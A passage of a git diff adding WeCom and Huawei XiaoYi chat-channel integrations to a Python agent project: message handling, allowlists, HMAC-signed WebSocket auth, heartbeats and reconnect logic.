"wecom_chatid": chatid, + "wecom_chat_type": chat_type, + "wecom_frame": frame, + "is_group": is_group, + } + + allowed, error_msg = self._check_allowlist(sender_id, is_group) + if not allowed: + logger.info( + "wecom allowlist blocked: sender=%s is_group=%s", + sender_id, + is_group, + ) + await self._send_text_via_frame( + frame, + error_msg or "Access denied.", + ) + return + + # Send "processing" indicator only if message has text content + processing_stream_id = "" + if text_parts and self._client: + processing_stream_id = generate_req_id("stream") + try: + await self._client.reply_stream( + frame, + stream_id=processing_stream_id, + content="🤔 思考中...", + finish=False, + ) + except Exception: + logger.debug("wecom failed to send processing indicator") + + session_id = self.resolve_session_id(sender_id, meta) + if processing_stream_id: + meta["wecom_processing_stream_id"] = processing_stream_id + native = { + "channel_id": self.channel, + "sender_id": sender_id, + # Group chats share one session; omit user_id so the + # session file is keyed by session_id only. + "user_id": "" if is_group else sender_id, + "session_id": session_id, + "content_parts": content_parts, + "meta": meta, + } + logger.info( + "wecom recv: sender=%s chatid=%s msgtype=%s text_len=%s", + sender_id[:20], + (chatid or "")[:20], + msgtype, + len(text), + ) + if self._enqueue is not None: + self._enqueue(native) + except Exception: + logger.exception("wecom _on_message failed") + + def _on_enter_chat_sync(self, frame: Any) -> None: + """Sync handler called from SDK event; dispatches to async loop.""" + if not self._loop or not self._loop.is_running(): + logger.warning("wecom: main loop not set/running, drop enter_chat") + return + asyncio.run_coroutine_threadsafe( + self._on_enter_chat(frame), + self._loop, + ) + + async def _on_enter_chat(self, frame: Any) -> None: + """Handle enter_chat event; send welcome reply if configured.""" + logger.info("wecom enter_chat event") + if not self.welcome_text or not self._client: + return + await self._client.reply_welcome( + frame, + {"msgtype": "text", "text": {"content": self.welcome_text}}, + ) + + # ------------------------------------------------------------------ + # File download helper + # ------------------------------------------------------------------ + + async def _download_media( + self, + url: str, + aes_key: str = "", + filename_hint: str = "file.bin", + ) -> Optional[str]: + """Download (and optionally decrypt) media; return local path.""" + if not self._client: + return None + try: + data, filename = await self._client.download_file( + url, + aes_key or None, + ) + fn = filename or filename_hint + # Determine extension from hint if file has none + hint_ext = Path(filename_hint).suffix + if hint_ext and Path(fn).suffix in ("", ".bin", ".file"): + fn = (Path(fn).stem or "file") + hint_ext + self._media_dir.mkdir(parents=True, exist_ok=True) + safe_name = ( + "".join(c for c in fn if c.isalnum() or c in "-_.") or "media" + ) + url_hash = hashlib.md5(url.encode()).hexdigest()[:8] + path = self._media_dir / f"wecom_{url_hash}_{safe_name}" + path.write_bytes(data) + return str(path) + except Exception: + logger.exception("wecom _download_media failed url=%s", url[:60]) + return None + + # ------------------------------------------------------------------ + # Send helpers + # ------------------------------------------------------------------ + + async def _send_text_via_frame( + self, + frame: Any, + text: str, + stream_id: str = "", + ) -> None: + """Send a text reply using the SDK reply method (stream finish). + + Args: + frame: WebSocket frame from the incoming message. + text: Content to send. + stream_id: Optional stream ID to overwrite existing message. + If empty, a new UUID is generated. + """ + if not self._client or not text: + return + try: + sid = stream_id or generate_req_id("stream") + await self._client.reply_stream( + frame, + stream_id=sid, + content=text, + finish=True, + ) + except Exception: + logger.exception("wecom _send_text_via_frame failed") + + async def _send_image_via_send_message( + self, + chatid: str, + part: OutgoingContentPart, + ) -> None: + """Send image as markdown inline (best-effort via send_message).""" + if not self._client or not chatid: + return + image_url = getattr(part, "image_url", "") or "" + if not image_url: + return + # WeCom does not support uploading images via WS; use markdown link + try: + await self._client.send_message( + chatid, + { + "msgtype": "markdown", + "markdown": {"content": f"![image]({image_url})"}, + }, + ) + except Exception: + logger.exception("wecom _send_image_via_send_message failed") + + async def send_content_parts( + self, + to_handle: str, + parts: List[OutgoingContentPart], + meta: Optional[Dict[str, Any]] = None, + ) -> None: + """Send text (stream) and media parts back to WeCom.""" + if not self.enabled: + return + m = meta or {} + frame = m.get("wecom_frame") + chatid = ( + m.get("wecom_chatid") + or self._parse_chatid_from_handle(to_handle) + or "" + ) + + prefix = m.get("bot_prefix", "") or self.bot_prefix or "" + text_parts: List[str] = [] + media_parts: List[OutgoingContentPart] = [] + + for p in parts: + t = getattr(p, "type", None) or ( + p.get("type") if isinstance(p, dict) else None + ) + text_val = getattr(p, "text", None) or ( + p.get("text") if isinstance(p, dict) else None + ) + refusal_val = getattr(p, "refusal", None) or ( + p.get("refusal") if isinstance(p, dict) else None + ) + if t == ContentType.TEXT and text_val: + text_parts.append(text_val) + elif t == ContentType.REFUSAL and refusal_val: + text_parts.append(refusal_val) + elif t in ( + ContentType.IMAGE, + ContentType.FILE, + ContentType.VIDEO, + ContentType.AUDIO, + ): + media_parts.append(p) + + body = "\n".join(text_parts).strip() + if prefix and body: + body = prefix + body + + # Format markdown tables for WeCom compatibility + body = format_markdown_tables(body) + + # Use processing stream_id to overwrite "thinking..." indicator + # Only first reply uses it; subsequent replies get new stream_id + processing_sid = m.pop("wecom_processing_stream_id", "") + + if body and frame: + await self._send_text_via_frame(frame, body, processing_sid) + elif body and chatid: + # Proactive send without an inbound frame + try: + await self._client.send_message( + chatid, + { + "msgtype": "markdown", + "markdown": {"content": body}, + }, + ) + except Exception: + logger.exception("wecom send_content_parts proactive failed") + + # # the SDK does not support sending media files. + # for part in media_parts: + # pt = getattr(part, "type", None) + # if pt == ContentType.IMAGE and chatid: + # await self._send_image_via_send_message(chatid, part) + # elif pt in ( + # ContentType.FILE, ContentType.AUDIO, ContentType.VIDEO + # ): + # # Send file path/url as markdown link (WS channel limitation) + # file_url = ( + # getattr(part, "file_url", "") + # or getattr(part, "video_url", "") + # or "" + # ) + # if file_url and chatid: + # filename = Path(file_url).name or "file" + # try: + # await self._client.send_message( + # chatid, + # { + # "msgtype": "markdown", + # "markdown": { + # "content": f"[{filename}]({file_url})" + # }, + # }, + # ) + # except Exception: + # logger.exception( + # "wecom send_content_parts file link failed" + # ) + + async def send( + self, + to_handle: str, + text: str, + meta: Optional[Dict[str, Any]] = None, + ) -> None: + """Proactive send: use send_message with markdown body.""" + if not self.enabled: + return + m = meta or {} + chatid = ( + m.get("wecom_chatid") + or self._parse_chatid_from_handle(to_handle) + or "" + ) + frame = m.get("wecom_frame") + prefix = m.get("bot_prefix", "") or self.bot_prefix or "" + body = (prefix + text) if text else prefix + + if not body: + return + + if frame: + await self._send_text_via_frame(frame, body) + elif chatid and self._client: + try: + await self._client.send_message( + chatid, + { + "msgtype": "markdown", + "markdown": {"content": body}, + }, + ) + except Exception: + logger.exception( + "wecom send proactive failed chatid=%s", + chatid, + ) + else: + logger.warning( + "wecom send: no frame/chatid for to_handle=%s", + (to_handle or "")[:40], + ) + + # ------------------------------------------------------------------ + # Lifecycle + # ------------------------------------------------------------------ + + def _run_ws_forever(self) -> None: + """Background thread: run SDK event loop forever.""" + # macOS/Python 3.12+ fix: use SelectorEventLoop explicitly + if sys.platform == "darwin": + ws_loop = asyncio.SelectorEventLoop() + else: + ws_loop = asyncio.new_event_loop() + asyncio.set_event_loop(ws_loop) + + # Set thread name for debugging + threading.current_thread().name = "wecom-ws" + + try: + # Run connection in the new loop + ws_loop.run_until_complete(self._client.connect()) + ws_loop.run_forever() + except Exception: + logger.exception("wecom WebSocket thread failed") + finally: + try: + # Cancel all pending tasks + pending = asyncio.all_tasks(ws_loop) + for task in pending: + task.cancel() + if pending: + ws_loop.run_until_complete( + asyncio.gather(*pending, return_exceptions=True), + ) + ws_loop.run_until_complete(ws_loop.shutdown_asyncgens()) + ws_loop.close() + except Exception: + pass + + async def start(self) -> None: + if not self.enabled: + logger.debug("wecom channel disabled") + return + + if not self.bot_id or not self.secret: + raise RuntimeError( + "WECOM_BOT_ID and WECOM_SECRET are required when " + "the wecom channel is enabled.", + ) + + self._loop = asyncio.get_running_loop() + options = WSClientOptions( + bot_id=self.bot_id, + secret=self.secret, + max_reconnect_attempts=self._max_reconnect_attempts, + ) + self._client = WSClient(options) + + # Register event handlers + self._client.on("message", self._on_message_sync) + self._client.on("event.enter_chat", self._on_enter_chat_sync) + + self._ws_thread = threading.Thread( + target=self._run_ws_forever, + daemon=True, + name="wecom-ws", + ) + self._ws_thread.start() + logger.info( + "wecom channel started (bot_id=%s)", + (self.bot_id or "")[:12], + ) + + async def stop(self) -> None: + if not self.enabled: + return + if self._client: + try: + self._client.disconnect() + except Exception: + pass + if self._ws_thread: + self._ws_thread.join(timeout=5) + self._client = None + logger.info("wecom channel stopped") diff --git a/src/copaw/app/channels/wecom/utils.py b/src/copaw/app/channels/wecom/utils.py new file mode 100644 index 000000000..b32ed5eb2 --- /dev/null +++ b/src/copaw/app/channels/wecom/utils.py @@ -0,0 +1,108 @@ +# -*- coding: utf-8 -*- +"""WeCom channel utilities.""" +from __future__ import annotations + +import re +from typing import List + + +def format_markdown_tables(text: str) -> str: + """Format GFM markdown tables for WeCom compatibility. + + WeCom requires table columns to be properly aligned. + This function normalizes table formatting. + + Args: + text: Input markdown text possibly containing tables. + + Returns: + Text with formatted tables. + """ + lines = text.split("\n") + result: List[str] = [] + i = 0 + in_code_fence = False + while i < len(lines): + line = lines[i] + stripped = line.strip() + # Track fenced code blocks (```), pass through inside lines unchanged. + if stripped.startswith("```"): + in_code_fence = not in_code_fence + result.append(line) + i += 1 + continue + if in_code_fence: + result.append(line) + i += 1 + continue + # Detect table start (line with |) when not inside a code fence + if "|" in line: + # Collect table lines + table_lines: List[str] = [] + while ( + i < len(lines) + and "|" in lines[i] + and not lines[i].strip().startswith("```") + ): + table_lines.append(lines[i]) + i += 1 + # Format and add table + if table_lines: + result.extend(_format_table(table_lines)) + continue + result.append(line) + i += 1 + return "\n".join(result) + + +def _format_table(lines: List[str]) -> List[str]: + """Format a single markdown table.""" + if not lines: + return lines + + # Check if second row is separator (contains only -, :, |, spaces) + sep_pattern = re.compile(r"^[\s\-:|]+$") + has_separator = len(lines) >= 2 and sep_pattern.match(lines[1]) is not None + + # Parse cells, skipping the separator row (it will be rebuilt) + rows: List[List[str]] = [] + for idx, line in enumerate(lines): + if has_separator and idx == 1: + continue # Skip separator row; rebuild it from column widths + cells = [c.strip() for c in line.split("|")] + # Remove empty first/last cells from leading/trailing | + if cells and not cells[0]: + cells = cells[1:] + if cells and not cells[-1]: + cells = cells[:-1] + if cells: + rows.append(cells) + + if not rows: + return lines + + # Calculate column widths + col_count = max(len(r) for r in rows) + widths: List[int] = [0] * col_count + for row in rows: + for j in range(col_count): + cell = row[j] if j < len(row) else "" + widths[j] = max(widths[j], len(cell)) + + # Format rows with proper padding, inserting separator after header + formatted: List[str] = [] + for idx, row in enumerate(rows): + padded = [ + (row[j] if j < len(row) else "").ljust(widths[j]) + for j in range(col_count) + ] + formatted.append("| " + " | ".join(padded) + " |") + if idx == 0: + sep = ( + "| " + + " | ".join("-" * max(3, widths[j]) for j in range(col_count)) + + " |" + ) + formatted.append(sep) + + return formatted diff --git a/src/copaw/app/channels/xiaoyi/__init__.py b/src/copaw/app/channels/xiaoyi/__init__.py new file mode 100644 index 000000000..77a4fc983 --- /dev/null +++ b/src/copaw/app/channels/xiaoyi/__init__.py @@ -0,0 +1,17 @@ +# -*- coding: utf-8 -*- +"""XiaoYi channel module. + +XiaoYi (小艺) is Huawei's voice assistant platform. +This module implements A2A (Agent-to-Agent) protocol support. +""" + +from .channel import XiaoYiChannel +from .auth import generate_auth_headers, XiaoYiAuth +from .constants import DEFAULT_WS_URL + +__all__ = [ + "XiaoYiChannel", + "generate_auth_headers", + "XiaoYiAuth", + "DEFAULT_WS_URL", +] diff --git a/src/copaw/app/channels/xiaoyi/auth.py b/src/copaw/app/channels/xiaoyi/auth.py new file mode 100644 index 000000000..64e65babb --- /dev/null +++ b/src/copaw/app/channels/xiaoyi/auth.py @@ -0,0 +1,67 @@ +# -*- coding: utf-8 -*- +""" +XiaoYi authentication using AK/SK mechanism. +""" + +from __future__ import annotations + +import base64 +import hashlib +import hmac +import time +from typing import Dict + + +def generate_signature(sk: str, timestamp: str) -> str: + """Generate HMAC-SHA256 signature. + + Format: Base64(HMAC-SHA256(secretKey, timestamp)) + + Args: + sk: Secret Key + timestamp: Timestamp as string (milliseconds) + + Returns: + Base64 encoded signature + """ + hmac_obj = hmac.new(sk.encode(), timestamp.encode(), hashlib.sha256) + return base64.b64encode(hmac_obj.digest()).decode() + + +def generate_auth_headers(ak: str, sk: str, agent_id: str) -> Dict[str, str]: + """Generate WebSocket authentication headers. + + Args: + ak: Access Key + sk: Secret Key + agent_id: Agent ID + + Returns: + Dict of headers for WebSocket connection + """ + timestamp = str(int(time.time() * 1000)) + signature = generate_signature(sk, timestamp) + + return { + "x-access-key": ak, + "x-sign": signature, + "x-ts": timestamp, + "x-agent-id": agent_id, + } + + +class XiaoYiAuth: + """XiaoYi authentication helper class.""" + + def __init__(self, ak: str, sk: str, agent_id: str): + self.ak = ak + self.sk = sk + self.agent_id = agent_id + + def get_auth_headers(self) -> Dict[str, str]: + """Get authentication headers for WebSocket connection.""" + return generate_auth_headers(self.ak, self.sk, self.agent_id) + + def generate_signature(self, timestamp: str) -> str: + """Generate signature for given timestamp.""" + return generate_signature(self.sk, timestamp) diff --git a/src/copaw/app/channels/xiaoyi/channel.py b/src/copaw/app/channels/xiaoyi/channel.py new file mode 100644 index 000000000..8c39e980e --- /dev/null +++ b/src/copaw/app/channels/xiaoyi/channel.py @@ -0,0 +1,1456 @@ +# -*- coding: utf-8 -*- +"""XiaoYi Channel implementation. + +XiaoYi uses A2A (Agent-to-Agent) protocol over WebSocket. +""" + +from __future__ import annotations + +import asyncio +import json +import logging +import uuid +from typing import Any, Dict, List, Optional, TYPE_CHECKING + +import aiohttp + +from agentscope_runtime.engine.schemas.agent_schemas import ( + ContentType, + TextContent, +) + +from ....config.config import XiaoYiConfig as XiaoYiChannelConfig +from ..base import ( + BaseChannel, + OnReplySent, + OutgoingContentPart, + ProcessHandler, +) +from ..renderer import MessageRenderer, RenderStyle +from .auth import generate_auth_headers +from .constants import ( + CONNECTION_TIMEOUT, + DEFAULT_TASK_TIMEOUT_MS, + HEARTBEAT_INTERVAL, + MAX_RECONNECT_ATTEMPTS, + RECONNECT_DELAYS, + TEXT_CHUNK_LIMIT, +) + +logger = logging.getLogger(__name__) + +if TYPE_CHECKING: + from agentscope_runtime.engine.schemas.agent_schemas import AgentRequest + + +# Class-level registry to track active connections per agent_id +# This prevents multiple channel instances with same agent_id from conflicting +_active_connections: Dict[str, "XiaoYiChannel"] = {} +_active_connections_lock = asyncio.Lock() + + +class XiaoYiChannel(BaseChannel): + """XiaoYi channel using A2A protocol over WebSocket. + + This channel connects to XiaoYi server as a WebSocket client + and handles A2A (Agent-to-Agent) protocol messages. + """ + + channel = "xiaoyi" + uses_manager_queue = True + + def __init__( + self, + process: ProcessHandler, + enabled: bool, + ak: str, + sk: str, + agent_id: str, + ws_url: str, + task_timeout_ms: int = DEFAULT_TASK_TIMEOUT_MS, + on_reply_sent: OnReplySent = None, + show_tool_details: bool = True, + filter_tool_messages: bool = False, + filter_thinking: bool = False, + bot_prefix: str = "", + dm_policy: str = "open", + group_policy: str = "open", + allow_from: Optional[List[str]] = None, + deny_message: str = "", + ): + super().__init__( + process, + on_reply_sent=on_reply_sent, + show_tool_details=show_tool_details, + filter_tool_messages=filter_tool_messages, + filter_thinking=filter_thinking, + dm_policy=dm_policy, + group_policy=group_policy, + allow_from=allow_from, + deny_message=deny_message, + ) + + # XiaoYi platform supports markdown and code fences + # Tool call arguments should be in code blocks for better readability + self._render_style = RenderStyle( + show_tool_details=show_tool_details, + filter_tool_messages=filter_tool_messages, + filter_thinking=filter_thinking, + supports_markdown=True, + supports_code_fence=True, + use_emoji=True, + ) + self._renderer = MessageRenderer(self._render_style) + + self.enabled = enabled + self.ak = ak + self.sk = sk + self.agent_id = agent_id + self.ws_url = ws_url + self.task_timeout_ms = task_timeout_ms + self.bot_prefix = bot_prefix + + # WebSocket state + self._ws: Optional[aiohttp.ClientWebSocketResponse] = None + self._session: Optional[aiohttp.ClientSession] = None + self._connected = False + self._reconnect_attempts = 0 + self._stopping = False # Flag to prevent reconnect during stop + + # Session -> task_id mapping + self._session_task_map: Dict[str, str] = {} + + # Heartbeat task + self._heartbeat_task: Optional[asyncio.Task] = None + + # Receive loop task + self._receive_task: Optional[asyncio.Task] = None + + @classmethod + def from_env( + cls, + process: ProcessHandler, + on_reply_sent: OnReplySent = None, + ) -> "XiaoYiChannel": + """Create channel from environment variables.""" + import os + + return cls( + process=process, + enabled=os.getenv("XIAOYI_CHANNEL_ENABLED", "0") == "1", + ak=os.getenv("XIAOYI_AK", ""), + sk=os.getenv("XIAOYI_SK", ""), + agent_id=os.getenv("XIAOYI_AGENT_ID", ""), + ws_url=os.getenv( + "XIAOYI_WS_URL", + "wss://hag.cloud.huawei.com/openclaw/v1/ws/link", + ), + on_reply_sent=on_reply_sent, + ) + + @classmethod + def from_config( + cls, + process: ProcessHandler, + config: XiaoYiChannelConfig, + on_reply_sent: OnReplySent = None, + show_tool_details: bool = True, + filter_tool_messages: bool = False, + filter_thinking: bool = False, + ) -> "XiaoYiChannel": + """Create channel from config object.""" + if isinstance(config, dict): + return cls( + process=process, + enabled=config.get("enabled", False), + ak=config.get("ak", ""), + sk=config.get("sk", ""), + agent_id=config.get("agent_id", ""), + ws_url=config.get( + "ws_url", + "wss://hag.cloud.huawei.com/openclaw/v1/ws/link", + ), + task_timeout_ms=config.get( + "task_timeout_ms", + DEFAULT_TASK_TIMEOUT_MS, + ), + on_reply_sent=on_reply_sent, + show_tool_details=show_tool_details, + filter_tool_messages=filter_tool_messages, + filter_thinking=filter_thinking, + bot_prefix=config.get("bot_prefix", ""), + dm_policy=config.get("dm_policy", "open"), + group_policy=config.get("group_policy", "open"), + allow_from=config.get("allow_from"), + deny_message=config.get("deny_message", ""), + ) + + return cls( + process=process, + enabled=config.enabled, + ak=config.ak, + sk=config.sk, + agent_id=config.agent_id, + ws_url=config.ws_url, + task_timeout_ms=config.task_timeout_ms, + on_reply_sent=on_reply_sent, + show_tool_details=show_tool_details, + filter_tool_messages=filter_tool_messages, + filter_thinking=filter_thinking, + bot_prefix=config.bot_prefix, + dm_policy=config.dm_policy, + group_policy=config.group_policy, + allow_from=list(config.allow_from) if config.allow_from else None, + deny_message=config.deny_message, + ) + + def _validate_config(self) -> None: + """Validate required configuration.""" + if not self.ak: + raise ValueError("XiaoYi AK (Access Key) is required") + if not self.sk: + raise ValueError("XiaoYi SK (Secret Key) is required") + if not self.agent_id: + raise ValueError("XiaoYi Agent ID is required") + + async def start(self) -> None: + """Start WebSocket connection.""" + if not self.enabled: + logger.debug("XiaoYi: start() skipped (enabled=false)") + return + + try: + self._validate_config() + except ValueError as e: + logger.error(f"XiaoYi config validation failed: {e}") + return + + # Check if there's already an active connection for this agent_id + # and reuse it if only filter settings changed + global _active_connections + should_connect = True + async with _active_connections_lock: + existing = _active_connections.get(self.agent_id) + if ( + existing is not None + and existing is not self + and existing._connected # pylint: disable=protected-access + ): + # pylint: disable=protected-access + # Found active connection - update settings + logger.info( + "XiaoYi: Updating settings for existing " + f"connection agent_id={self.agent_id}", + ) + # Update render style settings on the existing channel + existing._render_style.filter_tool_messages = ( + self._render_style.filter_tool_messages + ) + existing._render_style.filter_thinking = ( + self._render_style.filter_thinking + ) + existing._render_style.show_tool_details = ( + self._render_style.show_tool_details + ) + # Re-register this instance + # (so the new instance becomes the active one) + _active_connections[self.agent_id] = self + # Copy the WebSocket state to this instance + self._ws = existing._ws + self._session = existing._session + self._connected = existing._connected + self._heartbeat_task = existing._heartbeat_task + self._receive_task = existing._receive_task + self._session_task_map = existing._session_task_map + # Mark old instance as not owning the connection anymore + existing._ws = None + existing._session = None + existing._connected = False + existing._heartbeat_task = None + existing._receive_task = None + should_connect = False + + if not should_connect: + logger.info( + "XiaoYi: Reused existing connection with updated settings", + ) + return + + # No existing connection or can't reuse - start new connection + await self._wait_and_register_connection() + + logger.info(f"XiaoYi: Connecting to {self.ws_url}...") + + try: + await self._connect() + except Exception as e: + logger.error(f"XiaoYi connection failed: {e}") + # Unregister on failure + await self._unregister_connection() + self._schedule_reconnect() + + async def _wait_and_register_connection(self) -> None: + """Stop any existing connection with same agent_id, then register.""" + global _active_connections + + # First, get existing connection and remove it from registry + existing = None + async with _active_connections_lock: + existing = _active_connections.get(self.agent_id) + if existing is not None and existing is not self: + # Remove from registry immediately + _active_connections.pop(self.agent_id, None) + # Register this instance + _active_connections[self.agent_id] = self + + # Now stop the old connection outside the lock + if existing is not None and existing is not self: + # pylint: disable=protected-access + logger.info( + "XiaoYi: Stopping old connection for " + f"agent_id={self.agent_id}", + ) + try: + # Set stopping flag FIRST to prevent any reconnect + existing._stopping = True + existing._connected = False + # Cancel tasks and wait for them to finish + if existing._heartbeat_task: + existing._heartbeat_task.cancel() + try: + await existing._heartbeat_task + except asyncio.CancelledError: + pass + if existing._receive_task: + existing._receive_task.cancel() + try: + await existing._receive_task + except asyncio.CancelledError: + pass + # Close WebSocket + if existing._ws: + await existing._ws.close() + if existing._session: + await existing._session.close() + logger.debug("XiaoYi: Old connection stopped") + except Exception as e: + logger.debug(f"XiaoYi: Error stopping old connection: {e}") + + logger.debug( + f"XiaoYi: Registered connection for agent_id={self.agent_id}", + ) + + async def _unregister_connection(self) -> None: + """Unregister this connection from active connections.""" + global _active_connections + async with _active_connections_lock: + if _active_connections.get(self.agent_id) is self: + _active_connections.pop(self.agent_id, None) + logger.debug( + "XiaoYi: Unregistered connection for " + f"agent_id={self.agent_id}", + ) + + async def _connect(self) -> None: + """Establish WebSocket connection.""" + headers = generate_auth_headers(self.ak, self.sk, self.agent_id) + + # Clean up any existing session first + await self._cleanup_session() + + self._session = aiohttp.ClientSession() + ws_timeout = aiohttp.ClientWSTimeout(ws_close=CONNECTION_TIMEOUT) + + try: + self._ws = await self._session.ws_connect( + self.ws_url, + headers=headers, + timeout=ws_timeout, + ) + + self._connected = True + self._reconnect_attempts = 0 + logger.info("XiaoYi: WebSocket connected") + + # Send init message + await self._send_init_message() + + # Start heartbeat + self._heartbeat_task = asyncio.create_task(self._heartbeat_loop()) + + # Start receive loop + self._receive_task = asyncio.create_task(self._receive_loop()) + + except Exception as e: + logger.error(f"XiaoYi: WebSocket connection error: {e}") + self._connected = False + raise + + async def _send_init_message(self) -> None: + """Send init message to server.""" + if not self._ws: + return + + init_msg = { + "msgType": "clawd_bot_init", + "agentId": self.agent_id, + } + + try: + await self._ws.send_json(init_msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send init message: {e}") + + async def _heartbeat_loop(self) -> None: + """Send heartbeat messages periodically.""" + while self._connected and self._ws: + try: + await asyncio.sleep(HEARTBEAT_INTERVAL) + + if not self._connected or not self._ws: + break + + heartbeat_msg = { + "msgType": "heartbeat", + "agentId": self.agent_id, + } + + await self._ws.send_json(heartbeat_msg) + + except asyncio.CancelledError: + break + except Exception as e: + logger.error(f"XiaoYi: Heartbeat error: {e}") + break + + async def _receive_loop(self) -> None: + """Receive and process messages from WebSocket.""" + if not self._ws: + return + + try: + async for msg in self._ws: + if msg.type == aiohttp.WSMsgType.TEXT: + await self._handle_message(msg.data) + elif msg.type == aiohttp.WSMsgType.ERROR: + logger.error( + f"XiaoYi: WebSocket error: {self._ws.exception()}", + ) + break + elif msg.type == aiohttp.WSMsgType.CLOSED: + logger.info("XiaoYi: WebSocket closed") + break + except asyncio.CancelledError: + pass + except Exception as e: + logger.error(f"XiaoYi: Receive loop error: {e}") + finally: + self._connected = False + # Only reconnect if not stopping + if not self._stopping: + self._schedule_reconnect() + + async def _handle_message(self, data: str) -> None: + """Handle incoming WebSocket message.""" + try: + message = json.loads(data) + logger.debug( + "XiaoYi: Received message: " + f"{json.dumps(message, indent=2)}", + ) + + # Validate agent_id + if message.get("agentId") and message["agentId"] != self.agent_id: + logger.warning( + "XiaoYi: Mismatched agentId " + f"{message['agentId']}, expected {self.agent_id}", + ) + return + + # Handle clear context + if ( + message.get("method") == "clearContext" + or message.get("action") == "clear" + ): + await self._handle_clear_context(message) + return + + # Handle tasks cancel + if ( + message.get("method") == "tasks/cancel" + or message.get("action") == "tasks/cancel" + ): + await self._handle_tasks_cancel(message) + return + + # Handle A2A request + if message.get("method") == "message/stream": + await self._handle_a2a_request(message) + + except json.JSONDecodeError as e: + logger.error(f"XiaoYi: Failed to parse message: {e}") + except Exception as e: + logger.error(f"XiaoYi: Error handling message: {e}", exc_info=True) + + async def _handle_a2a_request(self, message: Dict[str, Any]) -> None: + """Handle A2A request message.""" + try: + # Extract session ID + # (prefer params.sessionId, fallback to top-level) + session_id = message.get("params", {}).get( + "sessionId", + ) or message.get("sessionId") + task_id = message.get("params", {}).get("id") or message.get("id") + + if not session_id: + logger.warning("XiaoYi: No sessionId in message") + return + + # Store session -> task mapping + self._session_task_map[session_id] = task_id + + # Extract text from message parts + text_parts = [] + params = message.get("params", {}) + msg = params.get("message", {}) + parts = msg.get("parts", []) + + for part in parts: + if part.get("kind") == "text" and part.get("text"): + text_parts.append(part["text"]) + + content = " ".join(text_parts) + if not content.strip(): + logger.debug("XiaoYi: Empty message content, skipping") + return + + # Build native payload + content_parts = [TextContent(type=ContentType.TEXT, text=content)] + native = { + "channel_id": self.channel, + "sender_id": session_id, + "content_parts": content_parts, + "meta": { + "session_id": session_id, + "task_id": task_id, + "message_id": message.get("id"), + }, + } + + if self._enqueue: + self._enqueue(native) + else: + logger.warning("XiaoYi: _enqueue not set, message dropped") + + except Exception as e: + logger.error( + f"XiaoYi: Error handling A2A request: {e}", + exc_info=True, + ) + + async def _handle_clear_context(self, message: Dict[str, Any]) -> None: + """Handle clear context message.""" + session_id = message.get("sessionId") or "" + request_id = message.get("id") or "" + + logger.info(f"XiaoYi: Clear context for session {session_id}") + + # Send clear response + await self._send_clear_context_response(request_id, session_id) + + # Clean up session + if session_id: + self._session_task_map.pop(session_id, None) + + async def _handle_tasks_cancel(self, message: Dict[str, Any]) -> None: + """Handle tasks cancel message.""" + session_id = message.get("sessionId") or "" + request_id = message.get("id") or "" + task_id = message.get("taskId") or request_id + + logger.info(f"XiaoYi: Cancel task {task_id} for session {session_id}") + + # Send cancel response + await self._send_tasks_cancel_response(request_id, session_id) + + async def _send_clear_context_response( + self, + request_id: str, + session_id: str, + success: bool = True, + ) -> None: + """Send clear context response.""" + if not self._ws or not self._connected: + return + + json_rpc_response = { + "jsonrpc": "2.0", + "id": request_id, + "result": { + "status": {"state": "cleared" if success else "failed"}, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": request_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send clear context response: {e}") + + async def _send_tasks_cancel_response( + self, + request_id: str, + session_id: str, + success: bool = True, + ) -> None: + """Send tasks cancel response.""" + if not self._ws or not self._connected: + return + + json_rpc_response = { + "jsonrpc": "2.0", + "id": request_id, + "result": { + "id": request_id, + "status": {"state": "canceled" if success else "failed"}, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": request_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send cancel response: {e}") + + def _schedule_reconnect(self) -> None: + """Schedule reconnection attempt.""" + if self._stopping: + return + + if self._reconnect_attempts >= MAX_RECONNECT_ATTEMPTS: + logger.error("XiaoYi: Max reconnect attempts reached") + return + + delay_idx = min(self._reconnect_attempts, len(RECONNECT_DELAYS) - 1) + delay = RECONNECT_DELAYS[delay_idx] + self._reconnect_attempts += 1 + + logger.info( + "XiaoYi: Reconnecting in " + f"{delay}s (attempt {self._reconnect_attempts})", + ) + + async def reconnect(): + await asyncio.sleep(delay) + if self._stopping or self._connected: + return + + # Clean up old session before reconnecting + await self._cleanup_session() + + try: + await self._connect() + logger.info("XiaoYi: Reconnected successfully") + except Exception as e: + logger.error(f"XiaoYi: Reconnect failed: {e}") + self._schedule_reconnect() + + asyncio.create_task(reconnect()) + + async def _cleanup_session(self) -> None: + """Clean up WebSocket and session.""" + if self._ws: + try: + await self._ws.close() + except Exception: + pass + self._ws = None + + if self._session: + try: + await self._session.close() + except Exception: + pass + self._session = None + + async def stop(self) -> None: + """Stop WebSocket connection.""" + logger.info("XiaoYi: Stopping channel...") + + self._stopping = True # Prevent reconnect during stop + self._connected = False + + # Cancel tasks + if self._heartbeat_task: + self._heartbeat_task.cancel() + try: + await self._heartbeat_task + except asyncio.CancelledError: + pass + self._heartbeat_task = None + + if self._receive_task: + self._receive_task.cancel() + try: + await self._receive_task + except asyncio.CancelledError: + pass + self._receive_task = None + + # Close WebSocket + if self._ws: + await self._ws.close() + self._ws = None + + # Close session + if self._session: + await self._session.close() + self._session = None + + # Unregister from active connections + await self._unregister_connection() + + # Keep _stopping = True to prevent any reconnection attempts + # This channel instance will not be reused after stop + logger.info("XiaoYi: Channel stopped") + + async def send( + self, + to_handle: str, + text: str, + meta: Optional[Dict[str, Any]] = None, + ) -> None: + """Send text message via WebSocket. + + For A2A protocol with append=true, messages are chunked + at TEXT_CHUNK_LIMIT characters to avoid WebSocket disconnection + on large messages. + """ + if not self.enabled or not self._ws or not self._connected: + logger.warning("XiaoYi: Cannot send - not connected") + return + + meta = meta or {} + session_id = meta.get("session_id") or to_handle + task_id = meta.get("task_id") or self._session_task_map.get(session_id) + + if not task_id: + logger.warning(f"XiaoYi: No task_id for session {session_id}") + return + + # Don't send empty text + if not text or not text.strip(): + return + + # Get or create message ID for this session + message_id = meta.get("message_id", str(uuid.uuid4())) + + # Chunk text if too large + chunks = self._chunk_text(text) + + for chunk in chunks: + await self._send_chunk(session_id, task_id, message_id, chunk) + + def _chunk_text(self, text: str) -> List[str]: + """Split text into 